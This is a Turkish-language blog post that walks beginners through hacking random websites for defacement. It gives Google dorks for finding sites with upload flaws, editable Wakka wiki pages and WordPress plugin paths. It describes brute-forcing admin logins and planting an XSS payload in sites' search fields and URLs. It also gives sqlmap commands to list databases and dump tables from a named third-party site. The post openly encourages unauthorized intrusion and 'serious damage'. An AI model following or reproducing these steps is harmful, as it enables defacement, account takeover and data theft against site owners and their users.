1 - Upload Açığı ile site hackleme
Dork: intitle:"Powered by Phuploader"
Bunu Googlede aratırıyoruz ve sitelere tek tek indeximizin resmini yada html dosyasını yüklüyoruz.
2 - Waka wikii açığı ile hackleme
Dork: wakka.php?wiki=
Örnk: hacktivizm.org/wikini/wakka.php?"wiki=7juin/edit" linkin sonuna /edit koyuyoruz
Not: Siteye zarar vermez sadece zone kasmak icin kullanılabilir
3 - Brute Force ( Kaba Kuvvet )
Bu bir açık değildir. site üzerinde belirlenen admin - admin listesini kontrol eder ve olumlu sonucları size gösterir.
Dorukumuz:
/wp-content/plugins/hits
/wp-content/plugins/last
/wp-content/plugins/send
/wp-content/plugins/note
/wp-content/plugins/climb
/wp-content/plugins/sorry
/wp-content/plugins/gear
/wp-content/plugins/nothing
/wp-content/plugins/all
/wp-content/plugins/after
Arama motor isimli programımıza yapıştırıp araya basıyoruz bulunan siteleri kaydetip brute force adlı programımızı açıyoruz
Admin Ve Passlarımız ekliyip başlata basıyoruz. bulunan sonuclar alta gözükücektir. (DETAYLI BİLGİ İCİN @ghostkurts a instgram yolu ile iletisime geciniz)
4 - XSS Açığı
bu benim en çok kullandım açıklardan biridir.
Dorkumuz: index.php?id=
rasgele sitede bulunan arama butonlarına <script>alert(“Ghost Kurts”);</script> yapıştırıyoruz
Örnek:(hacktivizm.org/index.php?id=<script>alert(“Ghost Kurts”);</script> )
Not : Her Sitede 100% XSS Açık Olacak Diye Birşey Yok
5 - SQL Açığı
En Fazla Kullanılan Açıktır ve Çok Sağlam Zararlar Vura Biliriz.
Bilgisiyarımıza sqlmap kurduktan sonra cmdye açıyoruz ve şu komutları yazıyoruz.
cd ..
cd ..
cd sqlmap
sqlmap.py -u www.virtuoso41.blogstop.com/index.php?id=5 --dbs
Karşımızda Aşağılarda " available_database " Olacaktır Onun Altındakiler Bizim Databaselerimiz
Sonrasında İstediğimiz Databaseden Veri Çekmeye Başlıyoruz
sqlmap.py -u www.virtuoso41.blogspot.com//index.php?id=5 -D Databaseismi --tables
sqlmap.py -u www.virtuoso41.blogspot.com/index.php?id=1 -D Databaseismi -T veriadı -C kolon1,kolon2,kolon3 --dump
SqlMap İndirme Linki: https://sqlmap.org/
Hiç yorum yok:
Yorum Gönder